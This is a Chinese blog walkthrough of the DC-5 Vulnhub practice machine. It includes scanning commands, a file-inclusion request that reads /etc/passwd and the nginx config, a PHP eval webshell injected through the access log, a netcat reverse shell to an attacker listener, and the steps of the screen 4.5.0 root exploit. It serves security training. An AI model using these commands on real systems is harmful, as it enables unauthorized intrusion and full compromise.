DC-5靶机渗透测试

最新推荐文章于 2024-07-25 11:08:08 发布
最新推荐文章于 2024-07-25 11:08:08 发布
阅读量1.1k 收藏 7
点赞数 5
分类专栏: Vulnhub靶机 文章标签: 网络 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58783105/article/details/132262720
版权

文章目录

DC-5靶机渗透测试

1. 信息收集

1.1 主机扫描

arp-scan -l

image-20230809194926627

1.2 端口扫描

nmap -sS -p- 192.168.188.175

image-20230809194955876

2. 漏洞发现

image-20230809195145625

使用网站的页面功能后,点击打开contact页面的提交留言后,出现改变。原先的2020变为了2018。

image-20230809200041412

并且每刷新一次页面,页面上的值就会发生改变。

image-20230809200213405

直接去访问thankyou.php也是一样的。

image-20230809200854593

查看是否为文件包含漏洞,调用file协议查看一下网站目录,发现能够成功读取目录储存文件。

文件包含漏洞:可以允许攻击者利用未正确验证用户输入的文件路径导致恶意文件的执行或敏感文件的泄露。文件包含漏洞通常发生在Web应用程序中,其中动态地包含文件并且未对用户输入进行充分过滤和验证。攻击者可以利用此漏洞来执行任意的服务器端代码,包括恶意脚本、命令执行、包含敏感文件等。

http://192.168.188.175/thankyou.php?file=/etc/passwd

image-20230809201206709

通过Wappalyzer插件可以知道网站是nginx,nginx日志文件默认放在**/var/log/nginx下,配置文件是/etc/nginx/nginx.conf**。

image-20230809195336964

查看配置文件

http://192.168.188.175/thankyou.php?file=/etc/nginx/nginx.conf

image-20230809202206729

得知日志文件路径为**/var/log/nginx/access.log**。

3. 漏洞利用

3.1 bp上传一句话木马

使用bp抓包然后在日志文件中上传“一句话木马”,使用中国蚁剑进行连接。

浏览器访问路径如下,然后使用bp抓包。

http://192.168.188.175/thankyou.php?file=/var/log/nginx/access.log  # 看日志文件

image-20230809202931991

GET /hello-world! <?php @eval($_REQUEST[cmd])?> HTTP/1.1

image-20230809202851439

3.2 反弹shell

打开虚拟终端,发现当前用户的权限较低

image-20230809203128134

kali中监听一个端口4444

nc -lvp 4444

image-20230809204138795

设置反弹shell

在蚁剑终端执行如下命令

nc -e /bin/bash 192.168.188.157 4444

解析:

  • -e /bin/bash:是 nc 命令的选项之一。-e 选项后跟随要执行的命令,这里是 /bin/bash/bin/bash 是 Linux 系统中的默认 shell(命令行解释器),它允许用户与操作系统进行交互。
  • 如果目标主机(kali)正在监听4444端口,并且允许连接进来,那么 nc 命令将成功建立 TCP 连接。一旦连接建立成功,目标主机会执行 /bin/bash 命令(默认的交互式 shell),将执行的结果通过网络发送回连接的主机。连接主机会成为一个类似于远程 shell 的环境,可以通过命令和输入输出与目标主机进行交互。

image-20230809203849594

反弹成功

image-20230809203918217

设置python交互

python -c "import pty;pty.spawn('/bin/bash')"

image-20230809204049405

4. 提权

find / -user root -perm -u=s -print 2>/dev/null

image-20230809205146036

searchsploit搜索是否存在漏洞。

searchsploit screen 4.5.0

image-20230809205341328

查看41154.sh的绝对路径

searchsploit -p linux/local/41154.sh

image-20230809205450026

/usr/share/exploitdb/exploits/linux/local/41154.sh

查看文件内容

cat /usr/share/exploitdb/exploits/linux/local/41154.sh

image-20230809210005421

第一步:将上部分的c语言代码另存为libhax.c文件,然后gcc编译:

image-20230809210605837

gcc -fPIC -shared -ldl -o libhax.so libhax.c

image-20230809210956778

第二步:将第二部分的C语言代码写入rootshell.c文件中,并编译成rooshell文件。

image-20230809210717267

gcc -o rootshell /tmp/rootshell.c

image-20230809211051870

第三步:将剩下部分的脚本代码写入到run.sh文件中(文件名自定义),在开头加上**#!/bin/bash**注明执行环境。

image-20230809211243751

最后将run.sh以及编译好的libhax.so和rootshell文件拖入蚁剑。

image-20230810220716800

进到kali的python交互shell里,切换到tmp目录下

image-20230810220838730

运行run.sh,输入bash ./run.sh 提权

image-20230810220853057

查看当前用户权限

image-20230810220903446

进到/root查看flag

image-20230810221247970

来日可期x
关注
专栏目录
【vulnhub】---DC-5靶机
qq_43168364的博客
08-21 418
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-5靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 收集到的相关信息: *
DC-1靶机渗透测试
weixin_45537612的博客
01-13 581
前奏:联网 自己刚安装的kali竟然没网,在花费了不少时间团团转后,用了下面的方法得以解决 出处: kali2020 永久性网络配置 (1)在VMware里打开kali linuxDC-1靶机 (2)打开终端通过su切换到root用户 (3)用ip add查看kali ip:192.168.153.129 (4)运用nmap扫描192.168.153.0/24以获取靶机IP 扫描出靶机 IP:192.168.153.130 用nmap -sV -p- 192.168.153.130扫描开放的端口
DC5靶机
qq_40646572的博客
05-04 357
信息收集 开启dc5靶机。 先使用nmap扫描网段,发现dc5靶机,192.168.85.132.该靶机开启了 80端口以及111端口。 使用nmap未曾识别出端口服务。 web服务攻击 打开80服务的http服务。 大致看了下web服务的各项功能,发现concat页面中存在数据交互。 多次进行数据提交后,发现提交后的页面下面的Copyright ©数字一直在变动,怀疑此处有问题。 先尝试将存在参数交互的地方,尝试下sql注入。使用sqlmap跑一下,发现没有不存在注入点。 同时,扫描下目录。
DC-5靶机通关
最新发布
qq_63831588的博客
07-25 556
到这里我们只是可以查看文件而已,并不能上传文件,比如我写点代码什么之类的传上去,我们的最终目的是能够远程控制这台服务器,所以到这里我就又迷茫了,搜了一下教程以后知道了这么个东西,叫做日志文件,就是虽然我们不能够直接往里写东西,但是我们可以去请求一些东西,通过请求把我们的一些代码记录在那个日志文件中,然后我们利用文件包含漏洞引用一下这个日志文件,他就可以把里面的代码执行,这样的话不是就达到我们的目的了吗?找这个玩意儿的方式有很多,我这里用bp,当然wfuzz等等也是可以的,它的原理其实就是爆破!
DC-5靶机
weixin_45778886的博客
03-18 1341
下载安装 靶场下载地址:https://download.vulnhub.com/dc/DC-5.zip 信息收集 存后活主机探测 nmap -sP 192.168.124.0/24 端口服务探测 nmap -A 192.168.124.25 全端口扫描 nmap -sS 192.168.124.25 -p 1-65535 目录扫描 python3 dirsearch.py -u http://192.168.124.25/ -e* -i 200 网站服务探测 猜测可能存在文件包含 漏
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
【靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1231
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1426
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
vulnhub之DC5靶机
LainWith的博客
08-15 621
靶机概览信息收集nmap信息收集网站信息收集探测漏洞目录探测文件包含渗透攻击找出日志服务器一句话木马提权反弹shell交互式shell辅助工具提取手工执行脚本拿flag 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-5,314/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC5的M.
DC靶机系列:DC-5
Ays.Ie的博客
02-27 431
本篇文章为DC系列第5个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
靶机实战(DC-5)
weixin_45605313的博客
07-01 524
DC-5实验环境实验过程信息收集主机发现端口扫描服务发现网站指纹目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机DC-4 测试机:kali(IP:192.168.186.128),win10 实验过程 信息收集 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 服务发现 网站指纹 目录扫描 dribuster:使用/u
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 5742
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
067 渗透测试实战,靶机 DC-5
鸡蛋炒鸡蛋
05-27 1445
文章目录一:环境准备二:nmap扫描三:御剑扫描网站 一:环境准备 下载:点我 下载之后完成安装,过程详情请参考,063 渗透测试实战,靶机 DC-1 需要抓包软件bp,文件的下载安装可以参考我的 前面的内容 :047 Burp Suite的详细安装与使用 打开DC-5,建议把虚拟机升级到15.5.7,我之前的虚拟机做这个dc靶机实验的时候经常电脑蓝屏。   二:nmap扫描 扫描局域网主机号 nmap -sP 192.168.100.0/24 -oN nmap.sP 扫描端口号 nmap
vulnhub-dc5靶机
bqnagus
09-30 168
vulnhub-dc5靶机复现
DC-5 靶机实战
PigLL的博客
08-22 717
DC-5 靶机实战 实验环境: 靶机DC-5 攻击机:kali 使kali和DC-5在同一网段,都在NAT模式下 1.信息收集: 首先确定kali的IP 扫描同网段存活的主机 因为kali的IP为192.168.137.136 所以确定DC-5靶机的IP为192.168.137.143 对DC-5进行端口扫描 ...
靶机渗透DC-5
2301_76227305的博客
04-05 1003
感觉这个比之前的靶机难点,主要是你得看出来它存在文件包含漏洞。还有这个screen提权,一般人第一次看漏洞库这个脚本的话会有点懵。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

来日可期x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值